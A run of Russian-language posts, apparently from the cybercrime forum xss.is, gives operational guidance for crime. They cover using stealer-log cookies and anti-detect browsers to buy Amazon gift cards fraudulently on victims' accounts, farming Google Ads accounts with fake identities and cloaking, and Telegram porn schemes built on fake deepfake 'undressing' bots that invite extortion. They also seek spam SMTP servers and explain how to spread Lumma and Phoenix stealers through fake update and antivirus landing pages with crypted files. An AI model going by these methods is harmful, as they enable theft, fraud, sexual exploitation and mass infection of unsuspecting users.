___внимание! не трогайте чекером! только СОРТЕР, либо через NotePad ищем
.amazon. в директории самой папки с логами.
4.) так как скупов томительно долго ождать по выплате (это я понял еще в самом
начале работы с амазоном),
то заходим на noones.com
a) регаемся на любую временную почту
b) мобилу вообще не верифаю, достаточно гугл аутентификатор + секретки и
вперед продавать гифты!
___внимание! бывают кидалы, поэтому не торопитесь с лёту скидывать им гифт.
достаточно написать : "Hi, 501 cad Uber ecode" и ждите заветного слова
"send", отправляете и ждете в среднем 5-30 мин,
так как сделка открыта, деньги скупа находятся в гаранте у биржи. но не
пытайтесь кидать, не получится. Я лично не пробовал и не рекомендую.
УРА. У тебя, бро, все готово для работы. Читай далее теперь...
Идешь в антик, заполняешь профиль как по Userinformation в логе (достаточно
размера экрана, колво ядер\оперативы, видеокарта и поставить пару галочек
снизу Canvas, Audio.... камера, микро, колонки ставь 0).
(если не знаешь как правильно настраивать - напиши мне, скину скрин, либо ниже
скину скрин)
Добавляешь куки, где есть сам амаз. Запускаешь профиль антика.
Окно браузера открылось, заходишь на yahoo.ca (-com.au).
вводишь в поиске любую хрень рандомную, но чтоб поисковик распознал слова
"Uber gift from amazon",
можно написать так: "wannau sendt uberr tgift tcardttt froama amazonasdf asff"
выдаст результаты, ищем прямую ссылку на покупку гифта со 2,3,4,5,6
страницы выданных результатов в поисковике (только изредкис первой страницы
заходи) и переходим по ссылке
УРА. Процесс от настроек до захода на сам амаз завершен.
Теперь сам метод, и в последствии сам БАГ.
в моменте, когда уже нажал на прямую ссылку к покупке гифта, быстро мышку перенеси в самый вверх, выше адресной строки, чтобы мышка не находилась на самом сайте)
и потихоньку, мееееедленно обходными путями(ВАЖНО! чтобы в процесса
движения курсора, чтоб он не наводился ни на какие обьекты на сайте , чтобы
сам курсор оставался неизменным)
двигаешь мышку сначала к номиналу 50 (обязательно этот номинал)
навел на 50. ПОДОЖДАЛ минуту-полторы, и только ПОТОМ НАЖИМАЕШЬ НА 50. и дальше ждешь столько же (жди по разному в секундах)
потом как только курсор убрал с номинала 50 (курсор поменяется) и ждешь сразу же после того как поменялся курсор еще столько же по времени (60-90 сек, будь разным)
и потом доходишь до поля емейла (также КАЖДЫЙ РАЗ ждешь после того, как
меняется курсор) и вводишь вручную мыло.
___внимание, ВАЖНО. Я использую всегда бесплатную временную почту (для
экономии),
но на нее сильный фрод теперь, поэтому желательно почту, зареганную примерно в
2017-2021 годах (для количества гифтов более 1го шт, так как АФ ругается в
несезон)
ввел почту вручную (предварительно запиши ее заранее куда-нибудь, так как
работа идет НЕПРЕРЫВНО в браузере и окнами мелькать не надо, иначе АФ спалит)
также медленно доходим до "buy now". если запросит пасс, вводим его хоть каким образом Вам удобно(мелькать окнами разрешается, чтобы скопирнуть пасс, но я заранее копирую его в буфер обмена при самом начале запуска окна браузера)
и тут далее 3 варианта событий. Начинаю с первых 2х печальных (если пасс
подошел и не запросило 2фа, то предложит сохранить пароль , ПЕРВООЧЕРЕДНО то
также мееедленно идем и нажимем "NO")
*) когда вылезло окошко верифа по почте (если есть доступ то отлично),
либо смс на номер, в этом случае выкидываем лог и идем дальше.
**) когда запрашивает ввести номер карты (если есть цц в логах, то заранее
запиши куда-нибудь, чтоб не мелькать окнами, и это ВАЖНО):
___a) всегда делаем движения плавно и МЕЕЕДЛЕННО. доходим мышкой до надписи
"amazon" , она в углу, слева вверху.
нажимаем на нее и выбираем "go to cart".
___b) очутились в корзине. если НЕСКОЛЬКО товаров уже есть в корзине, то
нажимаешь сначала "deselect all"
и потом вручную выбираем галочки на свой гифт и ТОЛЬКО ОДИН товар, который
ниже по списку идет.
___c) выбрано 2 товара, идем "proceed to checkout", и вуа-ля, ввести номер цц
уже не надо.
остается тут же удалить товар, чтобы остался только наш гифт (НАПОМИНАЮ, делай
все мееедленно. процесс заказа гифта должен быть 30-40 мин).
ну и далее нажимаешь на "buy now" и перекидывает на успешный заказ гифта!
***) когда цц сразу же автоматом выбрана и не запросило пароль (окошко
сохранить пароль не появится в таком случае).
то идем медленно, обходными путями, чтоб курсор не менялся и нажимаем на "buy
now".
УРА. Ты дошел до заветного момента и вот САМ БАГ.
Мой рекорд по такой схеме: 19 шт по 50 cad (разово) но это было в сезон НГ и когда сервера на Норде не были так сильно задрочены, как сейчас.
Рекомендую просто использовать норм мобильные соксы. Лично мне было сложно тратиться всегда, как и сейчас. Поэтому максимально экономно с минимальными затратами.
Хз, полезно нет кому будет. Мне было по приколу обманывать АФ амазона. ДЕРЗАЙТЕ, БРАТЬЯ.
Кому что интересно по трафику - пишите по возможности времени буду отвечать.
P.S. новички не стесняемся , все когда-то начинали.
Летим к профитам
Хочу залить на дрейнер подскажите, какие гео актуальыне сейчас, если шарите можем вместе полить - бюджет от меня.
Напишите в тг @iEEE754CODE
Публикую мануал по фарму и запуску прогревочных рекламных кампаний в Google ADS , актуальный на 2024 год. Хочу сразу отметить, что я не автор, но как человек с успешным опытом работы в Google ADS могу сказать, что мануал действительно стоящий. Это отличный старт для работы с Google, и я уверен, что на основе этих знаний у вас сложится чёткое понимание, как и что делать.
Мануал охватывает многие ключевые аспекты как по фарму, так и по запуску прогревочных кампаний. Не стоит тратить сотни миллионов ноткоинов на покупку курсов и сомнительных материалов. Могу с уверенностью сказать, что этой информации достаточно, чтобы успешно начать. В процессе работы вы накопите опыт, который станет вашим главным преимуществом.
Желаю вам успехов!
Spoiler: ДЕНЬ 1 СТАРТ (Антик, Прокси, Создание Gmail, SMS сервисы)
Хороший фарм начинается с подготовки - поиска хороших расходников. И сразу пару слов о цикличности гугла. Это такая особенность сорса, что все расходники и способы залива гугла имеют интересное свойство: если с каким-то элементом начались проблемы, стоит протестировать его аналог, который работал раньше, а затем перестал. То есть когда полгода назад ты заливался с астропроксей, потом акки стали баниться и ты перешел на проксиселлер, а теперь проксиселлер ловят баны - нужно протестить астро. Понятно, что о похожей цикличности можно говорить и в других сорсах, но это будет больше про сами связки. В гугле же цикличность больше относится к технической составляющей и расходникам.
Антики в гугле цикличны. И хотя топ антиков меняется реже, чем топ проксей
и платежек, помни : баны могут происходить и из-за антика, либо его
настроек. Поэтому не забывай тестить и этот момент.
На июнь 2024 отлично себя показывают :
Дальнейшая настройка будет через Ads , в других антиках настраивай аналогично. Обновляй антики регулярно , потому что большинство пользователей быстро переходят на последнюю версию оригинального Chrome. Наш браузер тоже сделан на Chromium, и наша задача смешаться с толпой.
Если Chrome 125 версии уже вышел и 90% пользователей на нем, то и ваши аккаунты должны быть на 125 версии. Среди большого разнообразия реальных пользователей легче затеряться и избежать бана.
Советы по настройке цифрового отпечатка
То же самое касается всех остальных параметров, из которых состоит цифровой отпечаток. Например, для фарма под Windows мы специально купили мониторы 1920x1080 , потому что это самое популярное разрешение. Удобно на большинстве профилей выставлять такое же в антике и работать во весь экран.
Если работаешь с Octo и тебе подгрузило профиль с разрешением монитора меньше, чем тот, с которого работаешь, не разворачивай его во весь экран – это палево. Я работаю с популярных сборок компьютеров, что позволяет минимизировать использование шумов.
Настройка параметров:
На этом моменте остановлюсь подробнее, потому что хорошие прокси - это
краеугольный камень успешного фарма. Ведь если прокси зашкварены , все
остальные расходники и действия, какими бы качественными они ни были, теряют
смысл.
Прокси - одна из переменных, цикличность жизни которых выражена больше всего. Они отлетают постоянно, поэтому менять и возвращаться к старым приходится также постоянно. В первую очередь рекомендую диферсифицировать аккаунты , которые будешь создавать и фармить, по селлерам прокси. Уже на этом этапе наверняка заметишь разницу в количестве банов и сделаешь выводы.
Я чаще всего использую резидентские socks5 прокси. Но бывают периоды, когда именно они поголовно банятся, поэтому протокол прокси тоже периодически тестирую. С гео кабинета такая же ситуация: сегодня Канада банится, завтра запускается с ноги на черное.
Также есть мнение, что нужно фармить и заливать с одной и той же прокси. На самом деле у реальных пользователей Google айпи меняются постоянно, особенно если это мобильный телефон (вкл/выкл режим полета - уже новый айпишник). Поэтому нет ничего критичного в смене IP адреса. Более того, избежать этого не удастся: хоть я фармлю с резидентской прокси, в дальнейшем я все равно зайду с мобильной. Для повышения траста аккаунта я подключаю к нему мобильное устройство.
Важно, чтобы смена IP выглядела правдоподобно. Это не должно происходить часто. Приоритет отдаем селлерам, которые позволяют настроить смену айпи адреса таким образом, чтобы она происходила внутри одного города и/или одного оператора.
Создаю новый аккаунт. Сейчас создаю аккаунт для бизнеса, на текущий момент особой разницы в личных и бизнес аккаунтах нет, делаю 50/50. Но, например, в ноябре 2023, когда количество банов у нас резко увеличилось, мы заметили, что бизнес аккаунтов это не касается и делали только их. Как сам понимаешь, в другой период времени все может повернуться в обратную сторону.
Далее все поля заполняем адекватно: имя, фамилия, дата рождения должны быть человеческими, а не просто набор символов. Удобно заранее сделать себе таблицу и копировать из нее.
Создание Gmail аккаунта – это первый шаг к успешному фарму. С нашими советами этот процесс станет проще и эффективнее. Давай начнем этот путь вместе!
Номер не обязательно должен совпадать с гео аккаунта. Мы провели множество тестов и разницы не заметили. Однако, в зависимости от гео, СМС приходят по- разному. Классика - Англия. Если не приходит СМС с неё, пробуем Литву, Латвию, Чили, Кыргызстан.
И сразу, пока не истекло действие взятого номера, подключаю двухфакторную аутентификацию. В смсхаб запрашиваю повторную СМС на тот же номер. Если была привязана дополнительная почта, подтверждение СМС может не понадобиться.
С нашими советами ваш аккаунт будет защищён и готов к работе!
Создание профиля начинается с выбора фотографии. Можно воспользоваться любым генератором лиц, самые популярные - generated.photos и thispersondoesnotexist.com. Также можно по-старинке залезть в любую соцсеть, выставить подходящие пол и возраст, рандомные город и имя и выкачать понравившиеся реальные фотки. Если переживаешь за уникальность, можешь отзеркалить изображение. Таким образом, за 5 минут можно подготовить фотографии сразу для пачки аккаунтов.
Spoiler: Второй день: ПРИФАРМ И БАНЫ
Планируйте свою активность! Если фармите аккаунт раз в день, старайтесь заходить примерно в одно и то же время. Это создаёт впечатление реального человека с расписанием, например, работы, после которой он садится за компьютер.
Через сутки начинаю набивать куки.
Во время входа в аккаунт на второй или последующие дни может случиться бан почты, что означает, что вы даже не сможете войти в аккаунт. Не паникуйте! Вот что нужно делать:
Spoiler: День 3 и далее: Полноценный фарм🎯
С этого момента я не буду расписывать последовательность действий на каждый день. Очевидно, чем менее шаблонно вы будете действовать, тем лучше. Ваша задача — делать каждый аккаунт немного по-своему, каждый раз ломая паттерн поведения, как фримены из «Дюны» использовали “песчаную походку”, чтобы червь их не обнаружил.
Сделай свой аккаунт живым и активным, используя поисковые запросы правильно!
Будь активным и разнообразным!
Создай активный аккаунт, используя все возможности Google!
Создайте активный аккаунт, используя интернет-магазины!
Выполняйте цели для оптимизации из Google Аналитики:
Разовые действия помогают создать более реалистичный паттерн поведения. Эти действия выполняются редко, поэтому не нужно делать их каждую сессию. Однако, 1-2 раза каждое действие создаст впечатление естественного использования аккаунта.
Создай активный аккаунт на YouTube, чтобы выглядеть как реальный пользователь!
Увеличьте траст аккаунта, используя вход с мобильного устройства!
Оптимальная продолжительность фарма для максимальной выживаемости аккаунтов!
Spoiler: Создание прогревочной Рекламы [Google ADS]
1. Заходим в ads.google.com, жмем sign in
2. Далее "Новый аккаунт Google ADS"
3. Далее пропустить создание компании
4. На следующем экране проверяем что все подтянулось правильно жмем далее
5. Создаем платежный профиль
6. Пишу название похожее на настоящее адрес подтянулся автоматически.
7. Вяжу карту
8. После этого скролю вниз и жму submit
9. После привязки карты даю сутки отлежатся.
Цикличность платежных решений:
Платежки в Google, как и другие расходники, цикличны. Однако, если найти не особо известный сервис или банк, можно пользоваться им месяцами без банов.
Создание прогревочного креатива для повышения траста аккаунта:
Процесс уникализации креативов для повышения траста аккаунта:
Использование видеоредактора:
1. Другие корректировки.
2. Фильтры.
3. Холсты.
4. Обрезка и т.д.
2. В заголовок и описание вставляю текст из видео + гео аккаунта
3. Скролю вниз, выбираю "не для детей" и жму далее
4. Следующие два экрана просто жму далее, на последнем выбираем public и жму опубликовать
5. После этого в левом меню выбираем контент, далее оптионс (3 точки справа от видео) и промоте
6. Далее 2 раза жмем next, выбираем бизнес профиль
7. Далее снова 2 раза некст, и на экране создания обьявления заполняем заголовки и описания, затем жмем некст
8. Выбираем что-то из предложенных ключей и жмем далее
9. Мне гугл сам предложил рекламу в конкретной точке, тк адрес ранее заполнен в профиле, так и оставляю
10. Бюджет ставлю около 5$
(в моем случае Австралийские доллары поэтому на скрине 11$). Аккаунт будет греться 5 дней, если бюджет позволяет и хочется сделать аккаунт покрепче в первый и второй день ставим 15$ и снижаем до 5$ на третий, и греем 7 дней.
11. На следующем экране жмем next и ждем next и компания опубликована!
С этого момента дофармливать акк можно реже, но важно не забрасывать фарм полностью. Даже когда аккаунт будет передан вебу, он должен заходить хотя бы через день и проявлять активность - открывать письма на почте, на какие- то из них отвечать, вбивать запросы по интересам и трендовые запросы. В каждый заход пяти минут дофарма будет достаточно!
Хочу дать вам один совет — воспринимайте информацию из мануала как фундамент. Вы можете адаптировать её под свои нужды и находить собственные подходы. В мануале описано, как можно действовать, но постарайтесь на основе этой информации создать свою уникальную систему фарма и запуска прогревочных рекламных кампаний.
Чем более уникальным будет ваш метод, тем лучше его воспримет сам Google. Это не значит, что нужно кардинально менять всё, что описано в мануале. Напротив, используйте предложенные методы как основу , на которой выстроите свой индивидуальный подход. Больше тестов и экспериментов!
Чат
Темный Траферов [Google ADS / Bing /
FB]
Регистрация домена в 1 клик! [Авто-подключение SSL от
Клауда]
** Все о трафике | BLACK ADS **[Вход запрещен!]
Автор:sabahulnoor
Источник: https://xss.is
Привет! Данная тема является прямым продолжением предыдущей части - [PART 1]
Всем привет! Спасибо тем кто написал отзывы, не важно позитивные или
негативные.
В серии данных статей я собираюсь рассказать про стандартные методы трафика, а
так же методы его монетизации.
Дабы завлечь ваше внимание, я вставлю это:
Надеюсь вы не запамятовали, что в прошлой части мы с вами обсуждали Tik-Tok и
Telegram как источники трафика, Канал в Telegram как место аккумуляции трафика
и его реализации в денежные средства через покупку доступа в VIP канал.
Хочу продолжить данную тему в этой части, ответить на парочку вопросов
поступивших мне в телеграм и разобрать ещё несколько способов решения такого
вопроса, как монетизация Мастурбаторов.
Для начала обсудим все вопросы.
Вопрос 1:
Tik-Tok как источник трафика, всё ещё стоит того?
Click to expand...
Ответ 1:
Почему глупые видео полуголых teenager celebrity таких как Даша Дошик и Tenderlybae и т.п. имеют так много охвата аудитории и просмотров? Неужто от того насколько полезную информацию они несут?
Click to expand...
Вопрос 2:
Почему именно Telegram? Неужели нельзя совершать конденсацию всего трафика в другом месте?
Click to expand...
Ответ 2:
Я честно говоря и не утверждал что Telegram является единсвтенным конечным пунктом назначения. Есть и другие места где можно собирать и перегонять трафик, не обязательно именно TG. Мне кажется очевидным почему для начала стоит использовать именно Telegram, я удивлён что подобные вопросы могут поступать на данном техническом форуме. Мы обязательно обсудим в последующем способы реализации трафика по категории 1. Порнография вне сети Telegram.
Click to expand...
Вопрос 3:
Можно ли использовать нейросети, для генерации изображений которые в последствии будут использованы в качестве контента для Dating?
Click to expand...
Ответ 3:
Да, мы об этом поговорим подробнее далее, однако не используйте дефолтные DALL I или BING или MidJourney. Пока что они не способны сгенерировать внятную оголённую женщину в нормальном качестве.
Click to expand...
На этом с вопросами покончили, вернёмся к обсуждению насущных вопросов,
трафика, рекламы, монетизации.
Как вы помните, в прошлой части я говорил про несколько стандартных вариантов
трафика. По сути это были покупки возможности обратить на себя внимание чужих
подписчиков.
Итак поговорим об этом подробнее.
Для начала вспомним, мастурбатор думает головкой (а не головой) , так же как например стандартный подписчик популярных новостных каналов (Топор 18+ и подобные ему, кстати, советую: 'И — боже вас сохрани — не читайте до обеда советских газет...Пациенты, не читающие газет, чувствуют себя превосходно ').
Главная движущая сила мастурбатора - цепляющий заголовок, в данном случае с
Эротическим подтекстом.
Предлагаю ознакомиться с парочкой моих заголовков, и креативов:
Вы возможно скажете:
Стыдоба, испанский стыд! Кто вообще на такое ведётся?
Click to expand...
К вашему разочарованию каждый из этих проектов успешен. Причём разочарование не во мне как в авторе данных постов, а в людях которые создают спрос на это.
Думаю после приведённых мной примеров, вы поймёте, что уловить внимание
мастурбатора, не сложная задача.
Сила креатива определяется тем, насколько широкую аудиторию мужского пола он
может привлечь.
Хорошо, клиента я привлёк, как его удержать?
"В нашем деле клиент привлечён до момента пока не кончит" - © Confucius...probably
Click to expand...
Для начала - первое, что видит ваш потенциальный клиент, это текст в главном
меню телеграма, где среди всех чатов, а у него их будет скорее всего много,
будет висеть ваш канал.
Как не потеряться из виду? Как всегда быть в топе подписанных каналов? Есть 2
способа:
1. Автопостинг каждые 3 часа начиная с 12:00 и до 03:00 по МСК. Почему?
12:00 - школьники к этому времени возвращаются домой, и мы ловим успешно 1-ый
поток аудитории.
15:00 - первые студенты начинают возвращаться домой, это половина второго
потока аудитории. После, в 18:00 вторая половина второго потока возвращается
домой, то есть студенты которые провели больше времени на учёбе.
21:00 - первые работяги с завода, и в принципе любой рабочий класс людей
которым не хватило мозгов научиться работать дома за ПК, приходя домой видят
первым в списке каналов наш.
00:00 - разгар ночной жизни, даже в среде мастурбаторов, удивлялся сам когда
узнавал, что некоторым мужчинам надо посмотреть на других голых женщин, дабы у
них была эрекция на свою женщину(weird shit).
03:00 - ночные мастурбаторы вступают в бой, те кто решают, что без голенькой
девочки на ночь невозможно заснуть, получают свою дозу удовольствия и кайфуют.
Таким образом ежедневно мы получаем 5 постов которые точно попадутся в глаза
аудитории, при этом зацепит ли эти посты аудиторию полностью зависит от
качества данных постов, то есть от вас.
2. Использование премиум эмоджи, дегенеративно привлекающих постов.
Приведу пример: Уже 12:00 и человек который последовал моему 1-ому способу
выложил свой пост. Если клиент был подписан на ваши оба канала, он пойдёт и
посмотрит то, что первое прыгнуло вверх. Что же делать в таком случае?
Перебить пост своим максимально претенциозным постом.
Раз пост вышел в 12:00 и для расчехления прибора мастурбатора нужно от
нескольких секунд до нескольких минут, в зависимости от возраста и
фин.положения клиента.
Вы делаете пост с цветастыми, анимированными эмоджи и текстом пишете: 'Что
такое белое течёт у тебя по ноге?'. Приправьте это каким-нибудь смайликом
уродским, и вы получите коктейль который заставит любого нажать и посмотреть,
что же там такое интересное.
Вы вероятно скажете:
А что мне мешает объединить данные 2 способа, чтобы получить уберпривлекательную стратегию удержания клиента.
Click to expand...
Я тоже так считал, но по моему опыту понял, что подобное быстро приедается и если попытаться засвидетельствовать статистику, на таких ресурсах как Telemetr, (хотя скорее всего ваш канал быстрее попадёт в бан телеметра, чем успеет показать вам стату) то станет ясно - после постоянных попыток и неоправданных ожиданий даже мастурбаторы начинают обижаться на подобную игру с их вниманием и уходят в другие каналы.
Насчёт автопостинга, я не хочу делать никакую рекламу ботам, просто расскажу
как делается это:
Захожу в приемлимого для меня бота для автопостинга
/start
Нажимаю 'Создать пост' keyboardButton
Отправляю боту то что хочу запостить
По желанию могу изменить данный пост как хочу, например добавить URL-кнопки,
это те самые кнопки внизу под постами с ссылками внутри, или реакции, в данном
случае это не встроенные в TG реакции, а такие же кнопки, но без ссылок
внутри, например: |хочу увидеть| |беее, не нравится|.
Далее нажимаем ОК.
Отложить пост по рассписанию
Вводим нужное время, например 12:00 29.03.2023
Готово!
Теперь поговорим про самое интересное, монетизейшн.
Итак мы привлекли и удержали аудиторию, что дальше?
Реально крупная монетизация эротического контента в Telegram может быть
сложной задачей, поскольку это может быть запрещено условиями обслуживания
некоторых платежных систем и рекламных платформ. Тем не менее, вот несколько
возможных способов монетизации вашего бота.
Тут полёт фантазии можед достигать абсолютных вершин.
Перечислю для вас способы которыми пользуюсь/пользовался сам:
1. Воспользуйтесь способом перегнать аудиторию из вашего основного канала, на
некий приватный/private/VIP/секретный канал, в котором вы даёте доступ к
материалам интересующим аудиторию без цензурирования. Как правило каждые 3
поста вы упомянаете о том, что вы выложили самое горячее из всего контента в
VIP канал, доступ в который могут получить избранные, если заплатят 'вставьте
сумму'. Так же хорошим вариантом будет поставить ссылку на покупку доступа в
закреп и в описание канала.
Варианты получения доступа могут быть абсолютно разными, например - пишите
менеджеру в ЛС, чтобы получить доступ к нашему VIP каналу. Либо же, возьмите
бота который будет выдавать нужную ссылку только после совершения транзакции
по заданному Qiwi/Карте, или же крипте.
VIP канал заполняйте большим количеством всего что видите, вас вообще мало
интересовать должно то что будет с людьми которые покупают аксесс к вашему
привату, можете придумать собственные способы удержания людей в вашем канале
на подписке, их достаточно много вообще-то.
2. Использовать новую систему P2V от Telegram. P2V - Pay to View система,
позволяет администратору канала скрывать желаемые материалы и делать их
доступными только по подписке. То есть, карманный OnlyFans в Telegram.
Делаем 30/70 посты, 70% цензурированных, 30% без цензуры, но платных. Берём по
10р за каждый цензуренный пост, или можем сделать абсолютно любые расценки.
Казалось бы 10р копейки, однако при условии доступности, купившие 1.000
человек доступ, будут делать вам 10.000р с одного поста, как вариант
охринительного заработка, можете использовать.
Однако помните, всеведущий Эпл даже сюда всунул свою руку, и блокнул
возможность отображения подобного контента на IOS, за что я в своё время
навестил и провёл хорошую ночь с мамой Тима Кука, в отместку за подобные
действия с его стороны.
Система находится в состоянии тестирования, как я слышал, но вы уже можете
сделать всё сами, оставляю ссылку на ютуб видео
[тут](https://www.youtube.com/watch?v=uQvQn1w-90w&ab_channel=InFoTel-
Telegram), если не ходите по ссылкам, то введите на ютубе 'How to setup P2V
Bot Telegram'
3. Используем ботов раздевальщиков. Я СОЛЬЮ ПОДОБНОГО БОТА. Об этом чуть
ниже.
По сути своей это бот, который утверждает, что может найти по аккаунтам
VK/Instagram/Telegram/Twitter человека, взломать его страницу и вытащить
оттуда его голые фото. Естественно в данном случае мы говорим о женщинах. И
тут мы приходим к ответу на 3-ий вопрос, используйте комбинацию API дипфейка и
бота, чтобы кривовато раздевать подруг малолетних мастурбаторов. Либо, что
делал лично я - изначально заливал фото без определения личности, то есть с
сильным засветом, еле видны волосы, не видно лица. Таким образом мы всегда
имеем шанс, что м'сье мастурбатор поверит будто бот работает, и поищет ещё
женщин, дабы потом им угрожать их голыми фото(да-да, к сожалению некоторые из
них даже не для того, чтобы вздр04нуть заходят туда).
4. Я хотел бы добавить про ботов Dating тематики, хотя они по сути относятся
к категории 3.
Почему-то все думаю, что боты дейтинг реально хороши в монетизации, однако по
моему опыту прибыль сильно проигрывает обычным ботам-взломщикам. Если только
их не объединить, сделав функцию раздеть партнёра с кем сейчас общаешься за
деньги, или же просто добавить отдельный слот под эскорт, чтобы в данном
случае уже 'Мамонт', а не мастурбатор, покупал себе несуществующую женщину.
На этом стандартные методы трафика, монетизации в Telegram заканчиваются.
Всё остальное является изобретательным инструментом который используется и по
сей день в строю. Поэтому просто так об этом вам никто не расскажет, но это не
отменяет того факта, что и на данных способах можно хорошо подняться.
Кстати всем кому хочется влететь в эту тему, и быть real P.I.M.P. предлагаю
вступать в чат общий.
Никаких ссылок не оставлю, найдёте его если напишете в поиске xsserotic
Скорее всего я соберу там столько молодых админов сколько смогу и потом
придумаю как их монетизировать, однако не отменяет факта что делиться своими
знаниями и опытом тоже буду.
Повторю сам себя:
Задавайте вопросов так много как возможно, я отвечу на них всех в следующей
статье.
Ставьте лайки подписывайтесь на канал всем удачи и всем пока.
Всем привет, столкнулся с проблемой что мало где продают smtp для рассылок
Обшарил уже весь интернет, списался со всеми селлерами на xss, нашёл один
сайт, но этого всё равно мало)
Кто-то из знающих может подсказать сайты с большим количеством smtp?
Или селлера с хорошей репутацией
Заранее спасибо!
Всем привет.
На протяжении 3 месяцев воркаю с капризным пиздюком под названием Google
ADS.После пачки банов и пакет потраченных нервов он навел меня на мысль
бросить эту затею и пойти на завод.Зашел в ВК чтобы получить очередную порцию
дешевого дофамина, наткнулся на пару мотивирующих роликов про успешный успех и
понял что на гугл у меня стоит и просто так я сдаваться не собираюсь))
Разобрался с платегами, смс, прокси, верифы, апилы, что еще нужно для полного
счастья? Наверно рюкзак знаний на плечах, и годы наработанной практики, к
сожалению сего у меня нет...
Собственно появилась очередная головная боль , в виде создания Белой страницы
и банов за обход системы, использую один домен = один вайт, не клоачу, по
содержанию страницы больше доверяю умельцам с арбитражных форумов, которые
наполняют мой сайт всякой чепухой, но все так же получаю баны.
С гугловской документацией ознакомился, все понятно, а так как опыта у меня
нет, самому писать и создавать креосы мне тупо страшно!Ведь своей жопорукостью
можно загасить аккаунты и смыть в унитаз потраченное время и деньги за
аккаунты, по этому обращаюсь к вам уважаемые траферы!
Вопрос: Какие критерии при создании White Page чтоб не попасть под обход
системы?
Буду благодарен за ваши ответы!
PS
Можно ли стать гуру трафика, если за спиной неоконченное НПО по специальности
сварщик? Ведь как любил говорить мой дядюшка Сэм -"Работа - не бей лежачего!"
Чтобы не быть жопой, поделюсь своими контактами для создания White Page
которыми пользуюсь лично!
https://t.me/ads_approved_channel - Проверенно, можно взять пакет на 10
сайтов за 350$ полный фарш! Домены, ссл, клоака
https://t.me/whitegen_bot - Бот ИИ, заказывал на тест, не особо
понравилось, в дикой природе еще не тестил. Ценник варируется от 5 до 15$ за
ленд, все зависит от сложности
Всем привет, нужно проспамить базу Gmail почт с любых авторегов . В письме просто текст,без ссылок и тд. Но письма все равно попадают в спам,даже если отправляю "Hey", пробовал новореги outlook, Yandex , mail.com . Подскажите что можно сделать,чтобы письма попадали в inbox
16/32/500/I9-9900K и R9-7950X
Файл весом 20 гб
Всем привет, thread для тех кто льёт или только начинает лить.
Будет интересно всем, Welcome!
Здравствуйте пользователи xss.
Это моя первая статья и дай бог не последняя
В последнее время тема "инсталлы" становится все более популярной.
В этой статье мы хотим разобраться ,что к чему и научить тебя как сделать установку самостоятельно и не переплатить огромную сумму денег.
Содержание:
1.Landing page
2.Регистрация домена и хоста
3.Настройка хостинга
4.Использование ПО
5.Получение первых инсталляций
Требуется мат.вложения, но результаты могут окупиться при правильной работе. Эта тема будет интересна тем, кто хочет открыть для себя новые виды трафика.
Spoiler: Landing Page
Для начала нашей работы нам понадобится приобрести лендинг страницу для вашего сайта.
Лендинг представляет собой страницу, призывающую пользователя сделать что- либо. Например, купить билеты на конференции, заказать сметы или просто запросить презентацию в интернете. Лэндинг - это призыв загрузить наш продукт, в данном случае у меня лоадера нет.
Где его взять?
В моем случае достаточно иметь страничку на форуме, там много людей с
подобными услугами. Средняя цена лендинга будет составлять от 20 до 50
долларов.
Белый лендинг - это безвредная страничка, на которой нет материалов, которые
могут нанести вред пользователю.
Черная страница - это наш лендинг, на котором мы будем размещать инсталяции
Лендинг повлияет на ваш трафик и качество загрузки. Если вы используете лендинг для игрового трафика, то у вас есть возможность получить игровые приложения. Принцип понятен.
Пример лендинга:
У меня в мануале есть два лендинга, которые будут использоваться для пролива:
белый и черный. Они могут быть взяты из любого сайта-визитки, портфолио
фотографа или дизайнера и т.п. xdan.ru/copysite/
Объясню на примере, зачем нам это программное обеспечение. Первым делом
открываем Google и находим лендинг по нашему гео, пример запроса в Google
«бесплатные html лендинги ЗДЕСЬ ВАШЕ ГЕО». Это дает нам веб-сайты целевые
страницы, я думаю, нет ничего сложного и ненужного объяснять. Выбирайте белый
лендинг по своим интересам, лично я получаю портфолио от фотографов. Скачиваем
любой из лендингов, у нас должно получиться что-то вроде этого:
В ней нас интересует только index.html
На сайте указанном выше можно редактировать документ.
Сохраняем наш файл, затем приступаем к парсингу черных целевых страниц. Лучшие
темы для черных целевых страниц по конверсии 1. Ваш браузер устарел — обновите
его 2. На вашем компьютере обнаружен вирус — скачайте антивирус 3. Ваш
компьютер заражен — сканируйте бесплатно прямо сейчас 4. Получите бесплатный
бонус с n -amount - скачать новое приложение. В верхней части списка можно
думать бесконечно.
Spoiler: Регистрация домена и хоста
Как правильно поступить при выборе домена? Наверное, самым практичным было бы
сэкономить, основная цель для нас — удаление установок. Лично я бы советовал
использовать домен для лендинга,
Лендинг для игр=> домен должен выглядеть как «gamecheat.com». Я думаю, это
ясно. Теперь перейдем к выбору хостинга. В этот момент многие люди начинают
путаться. Бесплатная версия будет отличаться от платной отсутствием некоторых
полезных функций, от размещения большего количества целевых страниц до SSL-
сертификата. Список хостингов обширен, но лично я рекомендую sprinthost
Трафик Восток-2 нам нравится, его будет достаточно для размещения нашей
страницы.
Покупка и привязка домена к сайту тоже осуществляется на данном сайте,
довольно все просто, не будем вдаваться в подробности.
Также сайт предоставляет бесплатный SSL-сертификат, поэтому не забываем
сделать редирект с http на https (все инструкции есть на сайте хостинга)
Spoiler: Настройка хоста
Загружаем сайт на хостинг с помощью FileZilla, получаем данные с FTP по
электронной почте после покупки тарифа. Обязательно убедитесь, что на панели
управления есть ползунок для SSL. Если его нет, то просим помощи в установке
SSL на ваш сервер. Загружаем белый шаблон на наш хостинг (в моем случае
портфолио фотографа, у вас может быть по-другому).
Spoiler: Использование ПО (стил)
Здесь можно долго выбирать то, что мы будем лить. Начиная с стилеров или
ратников, заканчивая хвнц.
Лично я рекомендую работать с лендами через Phoenix или Lumma ибо у того же
реда отстук в разы хуже, да и к тому же феникс и люмма подойдет отлично для
работы с большим объемом логов.
Отталкивайтесь от своих нужд, хотите ли вы продавать эти инсталлы или нет.
Нужен ли вам лоадер в связку или вы вовсе будете лить трафик на стилак.
Если будете лить люмму, то не ставьте сбор ненужных файлов по типу json куков
или ftp файлов. Исключите возможность попадания ботов на ваш стиллер поставьте
лимит по количеству куков/пассов.
Spoiler: Получение первых инсталлов
Основа хороших инсталлов будет наш крипт файла. Не стоит экономить на данном явлении, отвалите 10-15 зеленых за хороший крипт, который проживет хотя бы 5 дней. На данном форуме никого не могу порекомендовать к работе, мыслите обширнее. Нам не достаточно, чтобы дефендер не ругался. Нам нужны сертификаты для смартскрина от винды, чтобы получить хотя бы 20 инсталлов в первый день.
И так, начнем получать инсталлы, но для начала заключим то, что имеем:
У нас есть два лендинга (белый и черный); имеется хостинг с белым лендом;
настроенный софт; хороший крипт.
